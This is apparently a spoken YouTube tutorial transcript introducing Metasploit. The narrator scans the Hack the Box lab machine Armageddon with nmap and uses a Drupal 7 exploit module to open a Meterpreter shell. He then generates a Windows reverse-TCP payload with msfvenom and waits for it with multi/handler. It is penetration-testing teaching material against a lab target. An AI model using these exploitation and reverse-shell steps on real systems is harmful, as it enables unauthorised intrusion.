Hello everyone, it is Mr. Shark Spambot here, and in today's video, I'm going to be talking about Metasploit. So, the first thing you're going to need to do is download Metasploit. So, you can just go to metasploit.com and download whichever version you want. I'm going to be using the open source version, and you just click download here, and just run this command, and it should install for you. So, if Metasploit has been successfully installed, you should just be able to run msf console, and this will start Metasploit. So let me talk about the history of Metasploit really quickly, and then I'll actually show you how to use it. So Metasploit, it's an exploitation framework, and an exploit in hacking is a script which takes advantage of a security flaw. And you may ask, what do you mean take advantage? And this could be multiple things, but most commonly, you would want to get full control of a computer via shell. So usually these exploits, or most exploits these days, would give you back a shell. And Metasploit has a lot of exploits, so there are 2,149 currently, and that's a lot of exploits. So when Metasploit was originally created, it didn't have 2,149. It didn't even have 100 exploits when it was originally created. It was actually originally created in Perl. It had a few exploits and a few payloads in there as well. And it was created by, I believe, HD Moore. I'm not 100% sure. I think so. Let me just search that up. Who created it? Metasploit. And yes, it is HD Moore. But anyway, after a while, or not too long after it was created, it started gaining popularity. And after that, after just a little bit after that, they decided to convert the whole thing to Ruby, and that's what they did. They converted it to Ruby, and even today, Metasploit is still written in Ruby, and all its exploits are made in Ruby. So that's just a little bit of the history behind Metasploit. But anyway, I'm just going to be talking about some basics of how to use it today. So first of all, when you load Metasploit, you may get this saying certain modules going to be loaded. This is an auxiliary module to gather information about a printer, Office 360. I'm pretty sure this is a printer. If there are like multiple different exploits which can't load, then you may want to check the problem there. But if there's only like one exploit and it's not really necessary, not really needed that much, then don't freak out about it. It's fine. Also Metasploit will display this banner, or really whatever you want to call it. It'll display some ASCII art, and every time you load, it'll be different. So anyway, let me show you a little bit of its commands. So you could clear first of all, and so clear my screen, and you could do help to see all the options. There are quite a few. And by the way, you can actually run normal bash commands from Metasploit. So if I run cd /temp, and if I run pwd, we can actually see that I'm now in the temp directory. And cd again, and whoops, cd / great white, and run pwd again. I could see him back in my directory. But anyway, so to show you how to use Metasploit, I'm going to be getting initial access to a machine in Hack the Box called Armageddon, And so the first thing to do, of course, when you're hacking a machine, and of course, don't use this tool for malicious purposes, ethical purposes only. But the first thing you want to do is scan for ports and do your initial recon on your target. And port scanning can be done. There are many different tools. There's Nmap, Rust Scan, multiple different ones. But I'm going to be using Nmap right now. So I'm going to run nmap-sv-a, and the IP of the machine 10.10.10.233. And if you don't have Nmap installed, then go ahead and install it. It's an essential hacking tool, and on most hacking distros it will come pre-installed. You just need to run sudo apt-get install nmap. I'm not actually running a hacking distro. Um, this is a Debian machine which I installed the hacking tools on, so it's not like Kali or Parrot or anything. But if you're running something like Kali or Parrot or Black Arch, it should come pre-installed with Nmap. Really, any hacking OS should come pre-installed with Nmap. So this may actually take a little bit, and if you hit space, it would show how much time is remaining, how much is done. And so you already see there's an SSH port here. SSH is open. And you have an Apache server. So let's see. Okay, so whenever you're actually trying to hack a machine, or usually when you're running a pen test, it's usually going to be on a website. So port 80 being open or port 443 being open is kind of guaranteed. But anyway, we could see there's this open, and we could try to view the source code, and as you can see correctly. So it is evidently clear that this is using Drupal, and even the Nmap scan already said that Drupal was being used. So you don't even need to come here. You could have just searched some exploits on Metasploit and then go on further from there. So what you could do is you search Drupal, and you get multiple ones here. So let's try, well, they're mostly all excellent. So the version of Drupal being used was version 7. So we could do a quick Google search on which one of these exploits should be used. There's this one which is 2, and there's a 2 here. This is the exact same except there is no 2 here. Let's just see which one we are supposed to use. You could do a quick Google search. If I can actually get another page. Okay, and I am not okay. Oh god, oh god, oh god. Okay. We close this, close this, close this. Paste this Drupal 7 Metasploit exploit, and let this load. Hopefully it doesn't take too long. Okay. So it right over here says it's 2. So it is 2 which we need to use. So we could do use 1, and this will switch over to the exploit, and that would be this one. And okay, I'm lagging quite a bit, but close this tab and close this one as well. I don't really need any of these tabs actually, come to think of it, but could go right over. Oh god, okay. And this browser hasn't closed. Okay, just close now. I am lagging quite a lot, but anyway, and you could see by how slow that clear was, how much I am lagging. Wait, and I don't really need this either, so let's do that. So now you could do options, and this will show the options needed. And so whatever is set to required yes, you need to put in. These other options which are not required, you may also set as well, but you don't need to. So first of all, this lhost, I need to change this, and I'm going to split my terminal if I am allowed to. Okay, here we go. Run IPA. And one interesting thing with Metasploit you could do is that instead of setting the lhost to 10.10.16.55, which is this IP, I could also set it to 0, which is the network or the interface that I want to use. And if I actually go to, wait, I'm not sure, maybe this is not working correctly, but options. Okay, I'm not sure this is gonna work correctly, but I am usually able to do that. I also need to set the rhost, and this is the victim machine's IP, and by the way, lhost is my own IP, and this will be 10.10.233, and if I check my options, I should be good to go. So put this and run exploit. Oh, okay, and validate. Oh, whoops. And 10.10.233. You could use run or exploit. And okay, yeah, this did actually work when I put 10.0 there. It just didn't show the IP instead of 10.0. So it says the target is vulnerable, and it's now sending the stager, and Meterpreter session 1 has been opened. And am I gonna get? Okay, yeah. So now, as we see, we are in the Meterpreter. Now we can run help, and we could. These are all the commands that we could do, or we could run. And what I'm gonna do is first of all run sysinfo to get some system information, and you can even drop into a shell. And now I'm in a shell, so if I do dir or ls, same thing, I'm going to be able to actually see everything. So now you may notice that there's one little tiny problem with this, and that's that I can't actually see the directory. Like, you know, I have this, great white at shark, and then I go to the directory, so I go cd/temp, it would show the temp directory. I don't actually see that. So how am I going to make that pop up? And it's very simple. There are multiple ways to do this, but the way that I'm going to do this is using Python. So I just need to run Python 3 minus sign C, and then I'll do run a one-liner. So import pty dot spawn in dash bash, or just slash bash, and then it should be it. And oh, okay, so I can actually do it for this particular machine, but for most machines I am usually actually able to run this command, and then it'll actually show the actual terminal. But for this machine, for whatever reason, I can't actually do that. But so this is how you use an exploit in Metasploit. So now, what if I actually wanted to generate a payload and then wait for incoming connections and then get my connection back if the target executes the payload? How would I do that? So first thing I'm going to do is exit out of this, and you don't need to exit out of Metasploit. You don't need to exit out of this shell to go back to the Metasploit main menu. You could just do background, and it now backgrounds the session 1. But so if now I could check out the sessions, and if I want to interact with session 1, I could do as sessions 1, and now I'm interacting with 1. I run this, we could see all of this information. And if I want to exit, I could just run exit, and I don't really need this anymore. Again, this is not a hack the box video, this is just how to use Metasploit video. So I'm just going to exit out of this, and it says session 1 closed, reason user exit. So I could clear my screen, and I could go back, and now I'm back here. So now this is the way you would actually generate a Metasploit payload. And what I'm going to do is I'm going to use MSF Venom to do this. So this is how you generate a Windows payload. So you run MSF Venom, and when you install Metasploit, this comes installed as well. So you run MSF Venom-P to specify the payload, and I want to use Windows Interpreter reverse TCP. Now you specify your options, so I'll specify the lhost as well as that to my IP address. In this case, I'll just use this, and set the L port to 4444, and now I'll make the output file an exe, and you can also make this raw, but I want it to be exe. And say that you have you're using a Python interpreter reverse TCP. If you want it raw, it'll just be the Python code. If you want it to be exe, then I'll convert that into an exe. But anyway, I'm just going to use an exe, and I'm going to put this into a file, and I'll call this file payload.exe, and this should run and generate the payload for me. Well then, what I could do up here is I could use multi-handler, and first thing we need to do is configure the shell, configure the payload. So right now it's set to generic shell reverse TCP. We need to set the payload to whatever we put here, and we use Windows Interpreter reverse TCP here. So what we're going to need to do is set payload Windows Interpreter reverse TCP. And now we can do options, and it shows the payload as Windows Interpreter reverse TCP. And we need to set the lhost, which is my IP or your IP, and this will be 10.10.16.55. And if we clear, we can run options. And what the multi-handler does is it waits for incoming connections. So if I clear and do run, it's gonna say started a reverse TCP handler on 10.10.16.55.4444. So now if I actually ls, there is a file on my computer called payload.exe, and I could get that onto a Windows computer, and then if the target clicks it, it's gonna send me back a connection. Now, unfortunately, Metasploit payloads get detected by antivirus programs really easily. So nowadays, using a Metasploit payload, it just won't work because antivirus programs will automatically flag them. But this is just this is just me showing you how to use this tool itself, and that is how you use a that's how you generate a payload and use it. You just wait for incoming connections here, and I also showed you how to use an exploit. And usually these days, when you're trying to run a penetration test on a server, you're not gonna find something which is metasploitable. Okay, usually it's gonna be more complex than that. Although sometimes, in rare occasions, you may actually find something which you can exploit with Metasploit. So it is a very helpful tool, and especially its auxiliary scanners. They're very helpful, so they can actually detect if something is vulnerable, and then they could say what commands you may need to use to exploit it or something like that. This can be very useful, and so this tool you could really use nowadays to not as much, just hack a server or anything or run a pen test on it, but more of just to actually learn from. And that's a very good use of this nowadays. But anyway, thank you for watching this video. If you like this video, please hit that like button, subscribe to the channel, and make sure to be eager for more videos coming in the future.